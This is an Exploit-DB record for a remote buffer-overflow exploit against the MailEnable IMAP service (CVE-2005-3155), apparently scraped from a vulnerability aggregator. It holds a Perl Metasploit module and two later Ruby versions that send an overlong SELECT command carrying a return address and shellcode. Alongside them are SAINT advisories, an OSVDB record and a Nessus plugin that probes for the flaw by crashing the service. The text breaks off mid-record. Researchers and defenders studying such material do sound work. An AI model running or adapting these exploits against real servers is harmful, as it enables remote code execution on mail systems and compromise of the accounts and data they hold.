MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit
2005-11-20T00:00:00
ID EDB-ID:1332 Type exploitdb Reporter y0 Modified 2005-11-20T00:00:00
Description
MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit. CVE-2005-3155. Remote exploit for windows platform
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::mailenable_imap_w3c;
use strict;
use base 'Msf::Exploit';
use Msf::Socket::Tcp;
use Pex::Text;
my $advanced = {
};
my $info = {
'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'y0 <y0 [at] w00t-shell.net>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
'Priv' => 1,
'AutoOpts' =>
{
'EXITFUNC' => 'thread',
},
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 143],
'USER' => [1, 'DATA', 'IMAP Username'],
'PASS' => [1, 'DATA', 'IMAP Password'],
},
'Payload' =>
{
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x20",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a buffer overflow in the W3C logging
functionality of the MailEnable IMAPD service. Logging is not
enabled by default and this exploit requires a valid username
and password to exploit the flaw. MailEnable Professional version
1.6 and prior and MailEnable Enterprise version 1.1 and prior are
affected.
}),
'Refs' =>
[
['BID', 15006],
],
'Targets' =>
[
['MailEnable 1.54 Pro Universal', 0x1001c019], #MEAISP.DLL
],
'Keys' => ['imap'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my ($self) = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => 25,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$s->Send("QUIT\r\n");
my $res = $s->Recv(-1, 20);
$s->Close();
if ($res !~ /MailEnable Service, Version: 0-1\.54/) {
$self->PrintLine("[*] This server does not appear to be vulnerable.");
return $self->CheckCode('Safe');
}
$self->PrintLine("[*] Vulnerable installation detected :-)");
return $self->CheckCode('Detected');
}
sub Exploit {
my $self = shift;
my $targetHost = $self->GetVar('RHOST');
my $targetPort = $self->GetVar('RPORT');
my $targetIndex = $self->GetVar('TARGET');
my $user = $self->GetVar('USER');
my $pass = $self->GetVar('PASS');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $shellcode = $encodedPayload->Payload;
my $target = $self->Targets->[$targetIndex];
my $sock = Msf::Socket::Tcp->new(
'PeerAddr' => $targetHost,
'PeerPort' => $targetPort,
);
if($sock->IsError) {
$self->PrintLine('Error creating socket: ' . $sock->GetError);
return;
}
my $resp = $sock->Recv(-1);
chomp($resp);
$self->PrintLine('[*] Got Banner: ' . $resp);
my $sploit = "a01 LOGIN $user $pass\r\n";
$sock->Send($sploit);
my $resp = $sock->Recv(-1);
if($sock->IsError) {
$self->PrintLine('Socket error: ' . $sock->GetError);
return;
}
if($resp !~ /^a01 BAD LOGIN-/) {
$self->PrintLine('Login error: ' . $resp);
return;
}
$self->PrintLine('[*] Logged in, sending overflow');
my $splat = Pex::Text::AlphaNumText(6196);
$sploit =
"a01 SELECT ". $splat.
"\xeb\x06". pack('V', $target->[1]).
$shellcode. "\r\n";
$sock->Send($sploit);
my $resp = $sock->Recv(-1);
if(length($resp)) {
$self->PrintLine('[*] Got response, bad: ' . $resp);
}
return;
}
1;
# milw0rm.com [2005-11-20]
{"id": "EDB-ID:1332", "hash": "ace6583b6c0c8f195f6162aba837fb81", "type": "exploitdb", "bulletinFamily": "exploit", "title": "MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit", "description": "MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit. CVE-2005-3155. Remote exploit for windows platform", "published": "2005-11-20T00:00:00", "modified": "2005-11-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/1332/", "reporter": "y0", "references": [], "cvelist": ["CVE-2005-3155"], "lastseen": "2016-01-31T14:01:23", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 8.0, "vector": "NONE", "modified": "2016-01-31T14:01:23"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3155"]}, {"type": "nessus", "idList": ["MAILENABLE_IMAP_LOGGING_OVERFLOW.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83006"]}, {"type": "saint", "idList": ["SAINT:E962BB565A40864787B48F196357F83F", "SAINT:7D568B6A44BCE5EC05156F69A6D8303C", "SAINT:A19B4FF9AC205F34D14BAB53A7F3A5C0"]}, {"type": "osvdb", "idList": ["OSVDB:19842"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/IMAP/MAILENABLE_W3C_SELECT"]}, {"type": "exploitdb", "idList": ["EDB-ID:16480"]}], "modified": "2016-01-31T14:01:23"}, "vulnersScore": 8.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/1332/", "sourceData": "##\n# This file is part of the Metasploit Framework and may be redistributed\n# according to the licenses defined in the Authors field below. In the\n# case of an unknown or missing license, this file defaults to the same\n# license as the core Framework (dual GPLv2 and Artistic). The latest\n# version of the Framework can always be obtained from metasploit.com.\n##\n\npackage Msf::Exploit::mailenable_imap_w3c;\nuse strict;\nuse base 'Msf::Exploit';\nuse Msf::Socket::Tcp;\nuse Pex::Text;\n\nmy $advanced = {\n };\n\nmy $info = {\n\t'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',\n\t'Version' => '$Revision: 1.1 $',\n\t'Authors' => [ 'y0 <y0 [at] w00t-shell.net>', ],\n\t'Arch' => [ 'x86' ],\n\t'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],\n\t'Priv' => 1,\n\t'AutoOpts' =>\n\t {\n\t\t'EXITFUNC' => 'thread',\n\t },\n\t'UserOpts' =>\n\t {\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\n\t\t'RPORT' => [1, 'PORT', 'The target port', 143],\n\t\t'USER' => [1, 'DATA', 'IMAP Username'],\n\t\t'PASS' => [1, 'DATA', 'IMAP Password'],\n\n\t },\n\t'Payload' =>\n\t {\n\t\t'Prepend' => \"\\x81\\xec\\x96\\x40\\x00\\x00\\x66\\x81\\xe4\\xf0\\xff\",\n\t\t'Space' => 600,\n\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\n\t\t'Keys' => ['+ws2ord'],\n\t },\n\t'Description' => Pex::Text::Freeform(qq{\n\t\tThis module exploits a buffer overflow in the W3C logging\n\tfunctionality of the MailEnable IMAPD service. Logging is not\n\tenabled by default and this exploit requires a valid username\n\tand password to exploit the flaw. MailEnable Professional version\n\t1.6 and prior and MailEnable Enterprise version 1.1 and prior are\n\taffected. \n}),\n\t'Refs' =>\n\t [\n\t\t['BID', 15006],\n\t ],\n\t'Targets' =>\n\t [\n\t\t['MailEnable 1.54 Pro Universal', 0x1001c019], #MEAISP.DLL\n\t ],\n\t'Keys' => ['imap'],\n };\n\nsub new {\n\tmy $class = shift;\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\n\n\treturn($self);\n}\n\nsub Check {\n\tmy ($self) = @_;\n\tmy $target_host = $self->GetVar('RHOST');\n\tmy $target_port = $self->GetVar('RPORT');\n\n\tmy $s = Msf::Socket::Tcp->new\n\t (\n\t\t'PeerAddr' => $target_host,\n\t\t'PeerPort' => 25,\n\t\t'LocalPort' => $self->GetVar('CPORT'),\n\t\t'SSL' => $self->GetVar('SSL'),\n\t );\n\n\tif ($s->IsError) {\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\n\t\treturn $self->CheckCode('Connect');\n\t}\n\n\t$s->Send(\"QUIT\\r\\n\");\n\tmy $res = $s->Recv(-1, 20);\n\t$s->Close();\n\n\tif ($res !~ /MailEnable Service, Version: 0-1\\.54/) {\n\t\t$self->PrintLine(\"[*] This server does not appear to be vulnerable.\");\n\t\treturn $self->CheckCode('Safe');\n\t}\n\n\t$self->PrintLine(\"[*] Vulnerable installation detected :-)\");\n\treturn $self->CheckCode('Detected');\n}\n\nsub Exploit {\n\tmy $self = shift;\n\n\tmy $targetHost = $self->GetVar('RHOST');\n\tmy $targetPort = $self->GetVar('RPORT');\n\tmy $targetIndex = $self->GetVar('TARGET');\n\tmy $user = $self->GetVar('USER');\n\tmy $pass = $self->GetVar('PASS');\n\tmy $encodedPayload = $self->GetVar('EncodedPayload');\n\tmy $shellcode = $encodedPayload->Payload;\n\tmy $target = $self->Targets->[$targetIndex];\n\n\tmy $sock = Msf::Socket::Tcp->new(\n\t\t'PeerAddr' => $targetHost,\n\t\t'PeerPort' => $targetPort,\n\t );\n\tif($sock->IsError) {\n\t\t$self->PrintLine('Error creating socket: ' . $sock->GetError);\n\t\treturn;\n\t}\n\n\tmy $resp = $sock->Recv(-1);\n\tchomp($resp);\n\t$self->PrintLine('[*] Got Banner: ' . $resp);\n\n\tmy $sploit = \"a01 LOGIN $user $pass\\r\\n\";\n\t$sock->Send($sploit);\n\tmy $resp = $sock->Recv(-1);\n\tif($sock->IsError) {\n\t\t$self->PrintLine('Socket error: ' . $sock->GetError);\n\t\treturn;\n\t}\n\tif($resp !~ /^a01 BAD LOGIN-/) {\n\t\t$self->PrintLine('Login error: ' . $resp);\n\t\treturn;\n\t}\n\t$self->PrintLine('[*] Logged in, sending overflow');\n\n\tmy $splat = Pex::Text::AlphaNumText(6196);\n\t$sploit =\n\t \"a01 SELECT \". $splat.\n\t \"\\xeb\\x06\". pack('V', $target->[1]).\n\t $shellcode. \"\\r\\n\";\n\n\t$sock->Send($sploit);\n\n\tmy $resp = $sock->Recv(-1);\n\tif(length($resp)) {\n\t\t$self->PrintLine('[*] Got response, bad: ' . $resp);\n\t}\n\n\treturn;\n\n}\n\n1;\n\n# milw0rm.com [2005-11-20]\n", "osvdbidlist": ["19842"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:15", "bulletinFamily": "NVD", "description": "Buffer overflow in the W3C logging for MailEnable Enterprise 1.1 and Professional 1.6 allows remote attackers to execute arbitrary code.", "modified": "2008-09-05T20:53:00", "id": "CVE-2005-3155", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3155", "published": "2005-10-05T23:02:00", "title": "CVE-2005-3155", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2016-10-03T15:01:59", "bulletinFamily": "exploit", "description": "Added: 12/03/2005 \nCVE: [CVE-2005-3155](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3155>) \nBID: [15006](<http://www.securityfocus.com/bid/15006>) \nOSVDB: [19842](<http://www.osvdb.org/19842>) \n\n\n### Background\n\n[MailEnable](<http://www.mailenable.com>) is a mail server for Windows platforms. The standard edition supports the SMTP and POP3 protocols. MailEnable Professional and MailEnable Enterprise also support IMAP and HTTPMail. \n\n### Problem\n\nMailEnable's IMAP service is affected by a buffer overflow condition in the handling of W3C logging. This could allow authenticated users to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<http://www.mailenable.com/download.asp>) to MailEnable Professional 1.7 or MailEnable Enterprise 1.1 with all needed [hotfixes](<http://www.mailenable.com/hotfix>). \n\n### References\n\n<http://secunia.com/advisories/17010> \n\n\n### Limitations\n\nExploit works on MailEnable Professional 1.6. A valid IMAP user name and password are required. \n\n### Platforms\n\nWindows 2000 / Windows XP \nWindows Server 2003 \n \n\n", "modified": "2005-12-03T00:00:00", "published": "2005-12-03T00:00:00", "id": "SAINT:7D568B6A44BCE5EC05156F69A6D8303C", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/mailenable_imap_w3c_logging", "type": "saint", "title": "MailEnable IMAP W3C Logging Buffer Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:40", "bulletinFamily": "exploit", "description": "Added: 12/03/2005 \nCVE: [CVE-2005-3155](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3155>) \nBID: [15006](<http://www.securityfocus.com/bid/15006>) \nOSVDB: [19842](<http://www.osvdb.org/19842>) \n\n\n### Background\n\n[MailEnable](<http://www.mailenable.com>) is a mail server for Windows platforms. The standard edition supports the SMTP and POP3 protocols. MailEnable Professional and MailEnable Enterprise also support IMAP and HTTPMail. \n\n### Problem\n\nMailEnable's IMAP service is affected by a buffer overflow condition in the handling of W3C logging. This could allow authenticated users to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<http://www.mailenable.com/download.asp>) to MailEnable Professional 1.7 or MailEnable Enterprise 1.1 with all needed [hotfixes](<http://www.mailenable.com/hotfix>). \n\n### References\n\n<http://secunia.com/advisories/17010> \n\n\n### Limitations\n\nExploit works on MailEnable Professional 1.6. A valid IMAP user name and password are required. \n\n### Platforms\n\nWindows 2000 / Windows XP \nWindows Server 2003 \n \n\n", "modified": "2005-12-03T00:00:00", "published": "2005-12-03T00:00:00", "id": "SAINT:E962BB565A40864787B48F196357F83F", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/mailenable_imap_w3c_logging", "title": "MailEnable IMAP W3C Logging Buffer Overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T17:19:52", "bulletinFamily": "exploit", "description": "Added: 12/03/2005 \nCVE: [CVE-2005-3155](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3155>) \nBID: [15006](<http://www.securityfocus.com/bid/15006>) \nOSVDB: [19842](<http://www.osvdb.org/19842>) \n\n\n### Background\n\n[MailEnable](<http://www.mailenable.com>) is a mail server for Windows platforms. The standard edition supports the SMTP and POP3 protocols. MailEnable Professional and MailEnable Enterprise also support IMAP and HTTPMail. \n\n### Problem\n\nMailEnable's IMAP service is affected by a buffer overflow condition in the handling of W3C logging. This could allow authenticated users to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<http://www.mailenable.com/download.asp>) to MailEnable Professional 1.7 or MailEnable Enterprise 1.1 with all needed [hotfixes](<http://www.mailenable.com/hotfix>). \n\n### References\n\n<http://secunia.com/advisories/17010> \n\n\n### Limitations\n\nExploit works on MailEnable Professional 1.6. A valid IMAP user name and password are required. \n\n### Platforms\n\nWindows 2000 / Windows XP \nWindows Server 2003 \n \n\n", "modified": "2005-12-03T00:00:00", "published": "2005-12-03T00:00:00", "id": "SAINT:A19B4FF9AC205F34D14BAB53A7F3A5C0", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/mailenable_imap_w3c_logging", "type": "saint", "title": "MailEnable IMAP W3C Logging Buffer Overflow", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:09", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83006/MailEnable-IMAPD-W3C-Logging-Buffer-Overflow.html", "id": "PACKETSTORM:83006", "type": "packetstorm", "title": "MailEnable IMAPD W3C Logging Buffer Overflow", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Imap \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in the W3C logging \nfunctionality of the MailEnable IMAPD service. Logging is \nnot enabled by default and this exploit requires a valid \nusername and password to exploit the flaw. MailEnable \nProfessional version 1.6 and prior and MailEnable Enterprise \nversion 1.1 and prior are affected. \n \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2005-3155'], \n[ 'OSVDB', '19842'], \n[ 'BID', '15006'], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'Space' => 600, \n'BadChars' => \"\\x00\\x0a\\x0d\\x20\", \n'StackAdjustment' => -3500, \n \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] #MEAISP.DLL \n], \n'DisclosureDate' => '', \n'DefaultTarget' => 0)) \nend \n \ndef check \nconnect \ndisconnect \n \nif (banner and banner =~ /MailEnable Service, Version: 0-1\\.54/) \nreturn Exploit::CheckCode::Vulnerable \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect_login \n \nbuf = rand_text_alphanumeric(6196, payload_badchars) \nseh = generate_seh_payload(target.ret) \nreq = 'a01 SELECT ' + buf + seh + \"\\r\\n\" \nsock.put(req) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/83006/mailenable_w3c_select.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:08:46", "bulletinFamily": "scanner", "description": "The remote host is running a version of MailEnable's IMAP service that is prone to a buffer overflow attack involving its handling of W3C logging. An attacker may be able to exploit this to execute arbitrary code subject to the privileges of the affected application, typically Administrator.", "modified": "2018-11-15T00:00:00", "id": "MAILENABLE_IMAP_LOGGING_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=19783", "published": "2005-10-04T00:00:00", "title": "MailEnable IMAP Server W3C Logging Overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19783);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2005-3155\");\n script_bugtraq_id(15006);\n\n script_name(english:\"MailEnable IMAP Server W3C Logging Overflow\");\n script_summary(english:\"Checks for logging buffer overflow vulnerability in in MailEnable's IMAP service\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote IMAP server is prone to a buffer overflow attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of MailEnable's IMAP service\nthat is prone to a buffer overflow attack involving its handling of\nW3C logging. An attacker may be able to exploit this to execute\narbitrary code subject to the privileges of the affected application,\ntypically Administrator.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mailenable.com/forum/viewtopic.php?t=8555\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.mailenable.com/hotfix/\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the 3 October 2005 IMAP Rollup Critical Update/Performance\nImprovement Hotfix referenced in the vendor advisory above.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MailEnable IMAPD W3C Logging Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/10/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/10/03\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mailenable:mailenable\");\n script_end_attributes();\n\n script_category(ACT_MIXED_ATTACK);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_dependencie(\"smtpserver_detect.nasl\", \"imap4_banner.nasl\");\n script_exclude_keys(\"imap/false_imap\");\n script_require_ports(\"Services/smtp\", 25, \"Services/imap\", 143);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"imap_func.inc\");\ninclude(\"smtp_func.inc\");\n\n\nport = get_kb_item(\"Services/imap\");\nif (!port) port = 143;\nif (!get_port_state(port) || get_kb_item(\"imap/false_imap\")) exit(0);\n\n\n# Make sure the banner is for MailEnable.\nbanner = get_imap_banner(port:port);\nif (!banner || \"* OK IMAP4rev1 server ready\" >!< banner) exit(0);\n\n\n# If safe checks are enabled...\nif (safe_checks()) {\n # nb: we'll won't do a banner check unless report_paranoia is \n # set to paranoid since the hotfix doesn't update the banner.\n if (report_paranoia <= 1) exit(0);\n\n # Check the version number from the SMTP server's banner.\n smtp_port = get_kb_item(\"Services/smtp\");\n if (!smtp_port) smtp_port = 25;\n if (!get_port_state(smtp_port)) exit(0);\n if (get_kb_item('SMTP/'+smtp_port+'/broken')) exit(0);\n\n banner = get_smtp_banner(port:smtp_port);\n if (banner =~ \"Mail(Enable| Enable SMTP) Service\") {\n # nb: Standard Edition seems to format version as \"1.71--\" (for 1.71),\n # Professional Edition formats it like \"0-1.2-\" (for 1.2), and\n # Enterprise Edition formats it like \"0--1.1\" (for 1.1).\n ver = eregmatch(\n pattern:\"Version: (0-+)?([0-9][^- ]+)-*\",\n string:banner,\n icase:TRUE\n );\n if (ver == NULL) {\n exit(1, \"cannot determine version of MailEnable's SMTP connector service\");\n }\n if (ver[1] == NULL) {\n edition = \"Standard\";\n }\n else if (ver[1] == \"0-\") {\n edition = \"Professional\";\n }\n else if (ver[1] == \"0--\") {\n edition = \"Enterprise\";\n }\n if (isnull(edition)) {\n exit(1, \"cannot determine edition of MailEnable's SMTP connector service!\");\n }\n ver = ver[2];\n\n if (\n # nb: Professional versions <= 1.6 may be vulnerable.\n (edition == \"Professional\" && ver =~ \"^1\\.([0-5]|6$)\") ||\n # nb: Enterprise versions <= 1.2 may be vulnerable.\n (edition == \"Enterprise\" && ver =~ \"^1\\.(0|1$)\")\n ) {\n w = string(\n \"***** Nessus has determined the vulnerability exists on the remote\\n\",\n \"***** host simply by looking at the version number of Mailenable\\n\",\n \"***** installed there. Since the Hotfix does not change the version\\n\",\n \"***** number, though, this might be a false positive.\\n\");\n security_hole(port:port, extra: w);\n }\n }\n exit(0);\n}\n# Otherwise, try to exploit it.\nelse {\n # Establish a connection.\n tag = 0;\n soc = open_sock_tcp(port);\n if (!soc) exit(0);\n\n # Read banner.\n s = recv_line(socket:soc, length:1024);\n if (!strlen(s)) {\n close(soc);\n exit(0);\n }\n\n # Try to exploit the flaw.\n #\n # nb: a vulnerable server will respond with a bad command and die after a few seconds.\n ++tag;\n c = string(\"nessus\", string(tag), \" SELECT \", crap(6800));\n send(socket:soc, data:string(c, \"\\r\\n\"));\n close(soc);\n sleep(5);\n\n # Try to reestablish a connection and read the banner.\n soc2 = open_sock_tcp(port);\n if (soc2) s2 = recv_line(socket:soc2, length:1024);\n\n # There's a problem if we couldn't establish the connection or read the banner.\n if (!soc2 || !strlen(s2)) {\n security_hole(port);\n exit(0);\n }\n close(soc2);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:16", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1014999\n[Secunia Advisory ID:17010](https://secuniaresearch.flexerasoftware.com/advisories/17010/)\nOther Advisory URL: http://www.mailenable.com/hotfix/\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0179.html\nGeneric Exploit URL: http://www.securiteam.com/exploits/6Q00M0AEKQ.html\n[CVE-2005-3155](https://vulners.com/cve/CVE-2005-3155)\n", "modified": "2005-10-03T05:17:39", "published": "2005-10-03T05:17:39", "href": "https://vulners.com/osvdb/OSVDB:19842", "id": "OSVDB:19842", "title": "MailEnable W3C Logging Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2019-10-11T18:02:41", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in the W3C logging functionality of the MailEnable IMAPD service. Logging is not enabled by default and this exploit requires a valid username and password to exploit the flaw. MailEnable Professional version 1.6 and prior and MailEnable Enterprise version 1.1 and prior are affected.\n", "modified": "2017-07-24T13:26:21", "published": "2005-12-05T05:00:27", "id": "MSF:EXPLOIT/WINDOWS/IMAP/MAILENABLE_W3C_SELECT", "href": "", "type": "metasploit", "title": "MailEnable IMAPD W3C Logging Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Imap\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in the W3C logging\n functionality of the MailEnable IMAPD service. Logging is\n not enabled by default and this exploit requires a valid\n username and password to exploit the flaw. MailEnable\n Professional version 1.6 and prior and MailEnable Enterprise\n version 1.1 and prior are affected.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-3155'],\n [ 'OSVDB', '19842'],\n [ 'BID', '15006'],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 600,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] #MEAISP.DLL\n ],\n 'DisclosureDate' => 'Oct 03 2005',\n 'DefaultTarget' => 0))\n end\n\n def check\n connect\n disconnect\n\n if (banner and banner =~ /MailEnable Service, Version: 0-1\\.54/)\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect_login\n\n buf = rand_text_alphanumeric(6196, payload_badchars)\n seh = generate_seh_payload(target.ret)\n req = 'a01 SELECT ' + buf + seh + \"\\r\\n\"\n sock.put(req)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/imap/mailenable_w3c_select.rb"}], "exploitdb": [{"lastseen": "2016-02-01T23:57:45", "bulletinFamily": "exploit", "description": "MailEnable IMAPD W3C Logging Buffer Overflow. CVE-2005-3155. Remote exploit for windows platform", "modified": "2010-06-15T00:00:00", "published": "2010-06-15T00:00:00", "id": "EDB-ID:16480", "href": "https://www.exploit-db.com/exploits/16480/", "type": "exploitdb", "title": "MailEnable IMAPD W3C Logging Buffer Overflow", "sourceData": "##\r\n# $Id: mailenable_w3c_select.rb 9525 2010-06-15 07:18:08Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Imap\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in the W3C logging\r\n\t\t\t\tfunctionality of the MailEnable IMAPD service. Logging is\r\n\t\t\t\tnot enabled by default and this exploit requires a valid\r\n\t\t\t\tusername and password to exploit the flaw. MailEnable\r\n\t\t\t\tProfessional version 1.6 and prior and MailEnable Enterprise\r\n\t\t\t\tversion 1.1 and prior are affected.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9525 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-3155'],\r\n\t\t\t\t\t[ 